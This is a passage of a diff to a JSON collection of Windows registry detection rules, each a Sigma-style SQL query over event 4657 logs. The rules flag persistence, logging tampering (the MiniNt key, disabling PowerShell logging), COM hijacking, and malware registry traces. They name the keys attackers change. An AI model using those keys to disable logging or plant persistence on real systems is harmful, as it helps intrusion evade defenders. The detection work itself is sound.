LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (NewProcessName LIKE 
'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_hide_function_user.yml" + "filename": "registry_set_persistence_search_order.yml" }, { - "title": "Potential Persistence Using DebugPath", - "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "title": "ScreenSaver Registry Key Set", + "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "status": "experimental", - "description": "Detects potential persistence using Appx DebugPath", - "author": "frack113", + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Legitimate use of screen saver" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control 
Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND NewValue LIKE '%.scr' ESCAPE '\\') AND NOT ((NewValue LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_appx_debugger.yml" + "filename": "registry_set_scr_file_executed_by_rundll32.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject 
LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Disable Windows Security Center Notifications", - "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "title": "Allow RDP Remote Assistance Feature", + "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", "status": "experimental", - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate use of the feature (alerts should be investigated either way)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_disable_security_center_notifications.yml" + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" }, { - "title": "Enable Microsoft Dynamic Data Exchange", - "id": "63647769-326d-4dde-a419-b925cc0caf42", - "status": "test", - "description": "Enable Dynamic Data Exchange protocol 
(DDE) in all supported editions of Microsoft Word or Excel.", + "title": "Potential Persistence Using DebugPath", + "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "status": "experimental", + "description": "Detects potential persistence using Appx DebugPath", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1559.002" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_office_enable_dde.yml" + "filename": "registry_set_persistence_appx_debugger.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing 
to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1112" ], "falsepositives": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 
'%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", - "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", + "status": "experimental", + "description": "Detects the modification of the registry to disable a system restore on the computer", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value 
modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Common Autorun Keys Modification", - "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR NewValue IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', 
'{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_common.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "WinSock2 Autorun Keys Modification", - "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects the addition of a key 'MiniNt' to the registry. 
Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "New Root or CA or AuthRoot Certificate to Store", - "id": "d223b46b-5621-4037-88fe-fda32eead684", - "status": "experimental", - "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", - "author": "frack113", + "title": "Registry Entries For Azorult 
Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "status": "test", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND NewValue = 'Binary Data')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE 
'\\')" ], - "filename": "registry_set_install_root_or_ca_certificat.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "IE Change Domain Zone", - "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "status": "experimental", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "test", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1137" + "attack.t1547.008" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_change_security_zones.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": 
"32b5db62-cb5f-4266-9639-0fa48376ac00", - "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Software installers downloaded and used by users" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": 
"registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "test", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_apt_pandemic.yml" }, { - "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", - "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", 
